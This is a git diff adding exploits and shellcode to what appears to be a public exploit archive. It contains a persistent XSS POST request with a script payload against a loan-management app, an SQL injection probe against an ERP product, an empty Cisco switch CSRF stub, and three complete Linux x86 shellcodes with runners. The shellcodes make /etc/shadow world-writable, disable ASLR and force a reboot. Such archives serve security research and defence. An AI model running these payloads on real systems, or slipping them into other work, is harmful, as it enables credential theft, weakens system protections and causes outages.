diff --git a/exploits/hardware/webapps/47203.html b/exploits/hardware/webapps/47203.html
new file mode 100644
index 000000000..46a275a6f
--- /dev/null
+++ b/exploits/hardware/webapps/47203.html
@@ -0,0 +1,63 @@
+# Product : Catalyst 3850 Series Device Manager
+# Version : 3.6.10E
+# Date: 01.08.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Alperen Soydan
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+@special thx:Haki Bülent Sever
+# Tested On : Win10 & KaliLinux
+
+
+Change Switch Password CSRF @Catalyst 3850 Series Device Manager
+note : You must edit the values written by "place"
+___________________________________________________________
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47198.txt b/exploits/multiple/webapps/47198.txt
new file mode 100644
index 000000000..12d4d9812
--- /dev/null
+++ b/exploits/multiple/webapps/47198.txt
@@ -0,0 +1,28 @@
+# Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: http://www.webstudio.co.zw/
+# Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884
+# Version: V2.0
+# Category: Webapps
+# Software Description : Ultimate Loan Manager is an online loam management system that allows lending businesses to manage their borrowers, loans, repayments, and collections with ease while being affordable at the same time.
+# CVE : CVE-2019-14427
+==================================================================
+
+#Description:XSS exists in WEB STUDIO Ultimate Loan Manager 2.0 by adding a branch under the Branches button that sets the notes parameter with crafted JavaScript code.
+
+
+
+POST /branch/store HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/branch/create
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+Cookie: XSRF-TOKEN=eyJpdiI6Imk3Y3llMlBkM0xOUHJNQ1NqYjg2dGc9PSIsInZhbHVlIjoiTmkxMlBlYnVTaHJYR0NZWWxNNEFrSE9PQ3UyUlA5OUg0eU1XUGoxWGR1UUJQbWk2KzRQVVhRTUhEMzBTWkVDMCIsIm1hYyI6Ijk0MGQxN2VhNGQzZDBhZjI4YTg4M2VkODE0NTVhNDFjNmM4MDEwM2U1NGQyOTM3N2FhZDZjMjdjNTUxYjE5ZDMifQ%3D%3D; laravel_session=U1GDgNLtFJQDdPa2jK8rb1vjWE6mkZ6XwrH0PxE7
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+_token=P31Y1Y1VoVj1yaN3lpSQfssubgRXYszMUpilyYSu&name=test¬es=%3cscript%3ealert(1)%3c%2fscript%3e
\ No newline at end of file
diff --git a/exploits/php/webapps/47199.txt b/exploits/php/webapps/47199.txt
new file mode 100644
index 000000000..4601d3114
--- /dev/null
+++ b/exploits/php/webapps/47199.txt
@@ -0,0 +1,21 @@
+# Exploit Title: WebIncorp ERP - SQL injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar
+# Version: Every version
+# CWE : CWE-89
+
+Vulnerable parameter: prod_id (product_detail.php)
+
+[GET Request]
+
+GET https://host/product_detail.php?prod_id=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=t57dv7rdsvut33jroled9v6435
+Host: host
+Referer: https://host/
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6afefed2a..ea6578c73 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41569,3 +41569,6 @@ id,file,description,date,author,type,platform,port
47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,
+47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,
+47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,
+47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b91c0e8ad..dfd117767 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -989,4 +989,7 @@ id,file,description,date,author,type,platform
47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
-47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47200.c b/shellcodes/linux_x86/47200.c
new file mode 100644
index 000000000..44d92cf40
--- /dev/null
+++ b/shellcodes/linux_x86/47200.c
@@ -0,0 +1,87 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: chmod(“/etc/shadow”, 0666) and exit for Linux/x86 - Polymorphic
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 53 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+ EXIT_CALL equ 1
+ CHMOD_CALL equ 15
+
+SECTION .text
+
+
+global _start
+
+
+ _start:
+ nop
+ cdq
+
+ push byte CHMOD_CALL
+ pop eax
+
+
+ push edx
+ push byte 0x77
+ push word 0x6f64
+
+ mov esi, 0x222933f0
+ add esi, 0x3f3f3f3f
+ push esi
+ xor esi, esi
+
+ mov esi, 0x243525f0
+ add esi, 0x3f3f3f3f
+ push esi
+ xor esi, esi
+
+
+ mov ebx, esp
+ push word 0666Q
+ pop ecx
+ int 0x80
+
+ mov al, EXIT_CALL
+ int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] =
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66"
+"\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81"
+"\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe"
+"\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f"
+"\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6"
+"\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+#------------------------- usage --------------------------------------------------#
+
+
+#include
+#include
+
+unsigned char code[] = \
+
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47201.c b/shellcodes/linux_x86/47201.c
new file mode 100644
index 000000000..24dfdc53b
--- /dev/null
+++ b/shellcodes/linux_x86/47201.c
@@ -0,0 +1,102 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: Linux x86 ASLR deactivation for Linux/x86 - Polymorphic
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 107 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+ WRITE_SYSCALL equ 4
+
+ CLOSE_SYSCALL equ 6
+
+SECTION .text
+
+global _start
+
+
+
+_start:
+ nop
+ mov eax, 0xffffffff
+ not eax
+ push eax
+ mov esi, 0x65636170
+ push esi
+ xor esi, esi
+ mov esi, 0x735f6176
+ push esi
+ xor esi, esi
+ push dword 0x5f657a69
+ push dword 0x6d6f646e
+ push dword 0x61722f6c
+ push dword 0x656e7265
+ push dword 0x6b2f7379
+ push dword 0x732f636f
+
+ mov esi, 0x72702f2f
+ push esi
+ xor esi, esi
+
+
+ mov ebx,esp
+ mov cx,0x2bc
+ mov al,0x6
+ inc al
+ inc al
+ int 0x80
+ mov ebx,eax
+ push eax
+ mov dx,0xb01
+ add dx,0x2f2f
+ push dx
+ mov ecx,esp
+ cdq
+ inc edx
+ mov al,WRITE_SYSCALL
+ int 0x80
+ mov al,CLOSE_SYSCALL
+ int 0x80
+
+ mov al, 1
+ int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] =
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f"
+"\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72"
+"\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3"
+"\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2"
+"\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+
+#------------------------- usage --------------------------------------------------#
+
+#include
+#include
+
+unsigned char code[] = \
+
+
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47202.c b/shellcodes/linux_x86/47202.c
new file mode 100644
index 000000000..7dc5c37e0
--- /dev/null
+++ b/shellcodes/linux_x86/47202.c
@@ -0,0 +1,78 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: [NOT encoded] Linux/x86 Force Reboot shellcode for Linux/x86 - Polymorphic
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 51 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+ SYSCALL_EXECVE equ 11
+
+SECTION .text
+
+global _start
+
+_start:
+ nop
+ or eax, 0xffffffff
+ not eax
+ push eax
+
+
+ mov eax, 0x8b90909d
+ not eax
+ push eax
+
+ mov eax, 0x9a8dd091
+ not eax
+ push eax
+
+ mov eax, 0x969d8cd0
+ not eax
+ push eax
+
+ xor eax, eax
+ mov ebx, esp
+ push eax
+ push word 0x662d
+ mov esi, esp
+ push eax
+ push esi
+ push ebx
+ mov ecx, esp
+ or al, SYSCALL_EXECVE
+ int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] =
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50"
+"\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0"
+"\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+
+
+
+#------------------------- usage --------------------------------------------------#
+
+include
+#include
+
+char *shellcode =
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
\ No newline at end of file